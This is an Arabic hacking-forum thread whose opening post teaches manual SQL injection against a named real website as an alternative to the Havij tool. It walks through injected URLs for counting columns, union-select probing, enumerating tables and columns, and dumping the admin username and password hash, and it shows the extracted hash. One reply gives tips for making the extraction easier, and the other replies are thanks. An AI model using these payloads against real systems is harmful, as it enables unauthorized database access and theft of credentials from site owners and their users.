:: vBspiders Professional Network ::
صفحة 1 من 2 1 2
عرض 40 مشاركات من هذا الموضوع لكل صفحة

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات (http://www.vbspiders.com/vb/f38.html)
-   -   درس إحترافي في SQL يدوي في حالة إيجاد صعوبة في Havij (http://www.vbspiders.com/vb/t47643.html)

farrousafm 05-15-2011 03:09 PM
درس إحترافي في SQL يدوي في حالة إيجاد صعوبة في Havij
 
http://img6.imageshack.us/img6/2904/139815193.gif
http://img138.imageshack.us/img138/9243/eannfr.gif
http://img143.imageshack.us/img143/7308/welcomeh.png

تحميل فيديو :

http://1.bp.blogspot.com/-m_EUB6LrgO...oad%2Blogo.jpg

http://img138.imageshack.us/img138/9243/eannfr.gif

وهذا الشرح :
كود:
أهلاً اليوم درسنا MANUAL SQL INJECTION يعني SQL يدوي بدون havij :
أنا وجدت موقع مصاب . أضف ' للتاكد. تمام

ألان نحاول إيجاد عدد الأعمدة وذلك بإضافة "order+by+رقم عشواي حتى يظهر الخطا"
فالنبدا .

ظهر الخطا في رقم 10 إذاً عدد الأعمدة 9. إذن سيكون الموقع هكذا :
http://arabexperts.me/details_article_old.php?id=294+order+by+9
ألان إكتب "union+select+عدد الأعمدة مترابطة " هكذا :
union+select+1,2,3,4,5,6,7,8,9
ليكون الموقع هكذا :
http://arabexperts.me/details_article_old.php?id=294+union+select+1,2,3,4,5,6,7,8,9
ظهر لنا رقم (عادةً يظهر رقم واحد لكن هذا خطا من الموقع) وهذا الرقم هو : 2
إذن فالعمود رقم 2 إكتب version() لمعرفة نوع الموقع

http://arabexperts.me/details_article_old.php?id=294+union+select+1,version(),3,4,5,6,7,8,9
5.0.91
ثم إكتب database() لمعرفة إسم الdatabase

http://arabexperts.me/details_article_old.php?id=294+union+select+1,database(),3,4,5,6,7,8,9
arabexp1_experts
ألان إكتب table_name وأضف للموقع هذا :
+from+information_schema.tables--
ليكون الموقع هكذا :
http://arabexperts.me/details_article_old.php?id=294+union+select+1,table_name,3,4,5,6,7,8,9+from+information_schema.tables--
رائع ألان اعطانا الأعمدة .
ألان ابحث عن عمود يكون إسمه قريباً من أدمن ك(admin،users،members،administrator.....)
رائع وجدت العمود users
ألان نستخرج أعمدة هذا العمود وذلك بإضافة column_name للعمود 2 وإضافة هذا :
+from%20information_schema.columns%20WHERE%20table_name=char(117,115,101,114,115)--
117,115,101,114,115 : users
يمكنكم تبديلها إن هنا :
http://getyourwebsitehere.com/jswb/text_to_ascii.html
إنظر ....
رائع وجدنا الأعمدة
نحن نحتاج الأدمين والباسورد إذن الأعمدة هي : username و password
إذن أضف للعمود 2 : concat(username,0x3a,password)
و+from+users--
users: إسم العمود
ليكون الموقع هكذا :
http://arabexperts.me/details_article_old.php?id=294+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9+from+users--

Admin:582301962f863541fdcefd744296f8b4
شكراً
درس من ahmdosa http://www.facebook.com/profile.php?id=100002460215113

JetLi 05-16-2011 10:08 PM
درس جميل لك جزيل الشكر

KaLa$nikoV 05-16-2011 11:54 PM
يعطيك العافيه ما قصرت

سلمت يمينك

Dr-X-Designer 05-17-2011 03:35 AM
السلام عليكم
بالتوفيق لك اخي
للتسهيل عليك يفضل استخدام الهكس نيابة عن الشار
واستخدام جروب كونكات نيابة عن الكنكات

:::::::::::::::::::::::::
::::::::::::::
::::::

يجي يوم افرح 05-17-2011 09:58 AM
سلمت اناملك على الدرس

تقبل مرورى

bleu moon 05-17-2011 10:48 PM
^_^

maxema 06-11-2011 07:13 PM
مشكور

bayrem23 06-12-2011 03:41 PM
يعطيك العافيه ما قصرت

tn_xblack 06-12-2011 05:37 PM
يعطيك العافيه ^_^

abdellasoft 07-18-2013 05:54 AM
رد: درس إحترافي في SQL يدوي في حالة إيجاد صعوبة في Havij
 
merciiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii

hafidh6 07-20-2013 01:10 AM
رد: درس إحترافي في SQL يدوي في حالة إيجاد صعوبة في Havij
 
يعطيك العافيه ^_^

hkr17 08-05-2013 05:08 PM
رد: درس إحترافي في SQL يدوي في حالة إيجاد صعوبة في Havij
 
merci nshalah bark ykoune chbébe

RiB 08-05-2013 05:55 PM
رد: درس إحترافي في SQL يدوي في حالة إيجاد صعوبة في Havij
 
☺♥mrc mn frère ☺♥

mr the angel1 09-01-2013 08:00 PM
رد: درس إحترافي في SQL يدوي في حالة إيجاد صعوبة في Havij
 
jhbvcxcvb uhgtfrgh

DaRk-PRiNcE110 09-04-2013 03:37 AM
رد: درس إحترافي في SQL يدوي في حالة إيجاد صعوبة في Havij
 
مشكور درس روعة
واصل


الساعة الآن 02:17 AM
صفحة 1 من 2 1 2
عرض 40 مشاركات من هذا الموضوع لكل صفحة


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0